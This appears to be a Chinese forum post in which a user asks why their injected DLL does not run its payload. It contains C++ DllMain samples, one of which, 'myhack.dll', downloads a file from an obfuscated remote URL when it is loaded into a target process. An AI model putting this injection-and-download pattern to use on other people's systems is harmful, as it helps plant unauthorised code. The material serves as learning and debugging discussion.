请教下各位大佬,DLL怎么执行payload,自己动手调试了无数遍就是不成功。
思路是:注入到进程里面,注入成功了但是没有执行代码,我试了各种各样的代码。
相关代码有:
22aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3x3e0f1%4x3U0M7^5x3o6W2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0R3K6x3K6b7@1z5e0t1^5207K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3x3K6x3#2y4o6b7&6z5o6S2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7&6x3o6t1^5x3K6b7H3还有些类似的,请问各位大佬是何缘故?耽误各位大佬点时间,解决了请各位大佬喝杯下午茶,捣鼓三天了!
extern "C" BOOL APIENTRY DllMain(HMODULE /* hModule */, DWORD ul_reason_for_call, LPVOID /* lpReserved */)
{
using namespace std;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
cout << "load from dll main" << endl;
//ShowImage2();
MessageBox(NULL, TEXT("dll proc attached"), NULL, MB_ICONINFORMATION | MB_YESNO);
break;
case DLL_THREAD_ATTACH:
//MessageBox(NULL, TEXT("dll thread attached"), NULL, MB_ICONINFORMATION | MB_YESNO);
break;
case DLL_THREAD_DETACH:
//MessageBox(NULL, TEXT("dll thread detached"), NULL, MB_ICONINFORMATION | MB_YESNO);
break;
case DLL_PROCESS_DETACH:
MessageBox(NULL, TEXT("dll proc detached"), NULL, MB_ICONINFORMATION | MB_YESNO);
break;
}
return TRUE;
}#include "windows.h"
#include "tchar.h"
#pragma comment(lib,"urlmon.lib")
#define DEF_URL (L"a23K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3&6S2N6X3g2J5i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9")
#define DEF_FILE_NAME (L"index.html")
HMODULE g_hMod = NULL;
DWORD WINAPI ThreadProc(LPVOID lParam)
{
TCHAR szPath[_MAX_PATH] = {0,};
if(!GetModuleFileName(g_hMod,szPath,MAX_PATH))
return FALSE;
TCHAR *p = _tcsrchr(szPath,'\\');
if(!p)
return FALSE;
_tcscpy_s(p+1,_MAX_PATH,DEF_FILE_NAME);
HRESULT hr = URLDownloadToFile(NULL,DEF_URL,szPath,0,NULL);
if (hr != S_OK)
return FALSE;
else
OutputDebugString(L"down finish!!!!");
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
HANDLE hThread = NULL;
g_hMod = (HMODULE)hinstDLL;
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
OutputDebugString(L"myhack.dll Injection!!!!");
hThread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
if (hThread)
OutputDebugString(L"down finish!!!!");
CloseHandle(hThread);
break;
}
return TRUE;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2019-7-2 16:53
被古朴编辑
,原因:
